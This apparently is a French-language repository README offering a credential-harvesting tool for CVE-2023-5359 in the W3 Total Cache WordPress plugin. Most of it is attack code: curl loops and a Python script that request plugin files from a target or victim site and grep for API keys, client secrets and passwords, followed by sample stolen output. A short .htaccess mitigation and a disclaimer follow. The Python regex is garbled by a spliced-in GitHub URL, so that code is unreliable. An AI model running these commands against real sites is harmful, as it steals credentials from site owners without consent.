
CVE-2023-5359 - Scanner de vulnérabilité de stockage en texte clair W3 Total Cache. Détecte les informations d'identification exposées dans les versions du plugin W3 Total Cache ≤ 2.7.5.
CVE-2023-5359 est une vulnérabilité de stockage en texte clair affectant le plugin WordPress W3 Total Cache dans les versions ≤ 2.7.5. Cette vulnérabilité permet à des attaquants distants d'accéder à des informations d'identification sensibles stockées dans des fichiers PHP non chiffrés et accessibles publiquement.
W3 Total Cache stocke les paramètres de configuration et les identifiants API dans des fichiers PHP situés dans le répertoire /wp-content/plugins/w3-total-cache/ sans protection adéquate. Ces fichiers sont accessibles via HTTP, exposant :
/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
/wp-content/plugins/w3-total-cache/Config.php
/wp-content/plugins/w3-total-cache/Cache_File.php
# Vérifier si W3 Total Cache est installé
curl -s https://target.com/ | grep "w3-total-cache"
# Extraire les identifiants CloudFlare
curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"
# Rechercher dans tous les fichiers vulnérables
for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
echo "=== $file ==="
curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
done
#!/usr/bin/env python3
import requests
import re
target = "https://victim.com"
files = [
"/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
"/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php"
]
for file in files:
response = requests.get(target + file)
credentials = re.findall(r"(api_key|client_secret|password)\s*=\s*['\"](https://github.com/enzocipher/cve-2023-5359/blob/HEAD/%5B%5E%27%5C%22%5D+)", response.text)
if credentials:
print(f"[!] Identifiants trouvés dans {file}:")
for key, value in credentials:
print(f" {key}: {value}")
Un attaquant peut obtenir :
# Protection .htaccess
<Files *.php>
Deny from all
</Files>
<Files "w3-total-cache.php">
Allow from all
</Files>
# Vérifier la version vulnérable
curl -s https://target.com/wp-content/plugins/w3-total-cache/w3-total-cache.php | grep "Version"
[*] Scan : https://example.com
[+] W3 Total Cache détecté
[+] Fichier accessible : /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
[!] IDENTIFIANTS TROUVÉS :
client_id: GAxxxxxxxxxxxx78
client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345
Ce dépôt est destiné à des fins éducatives et aux tests de pénétration autorisés uniquement. Toute utilisation malveillante de ces informations est strictement interdite.
Ces informations vous ont-elles été utiles ? Mettez une étoile au dépôt !
Dernière mise à jour : novembre 2025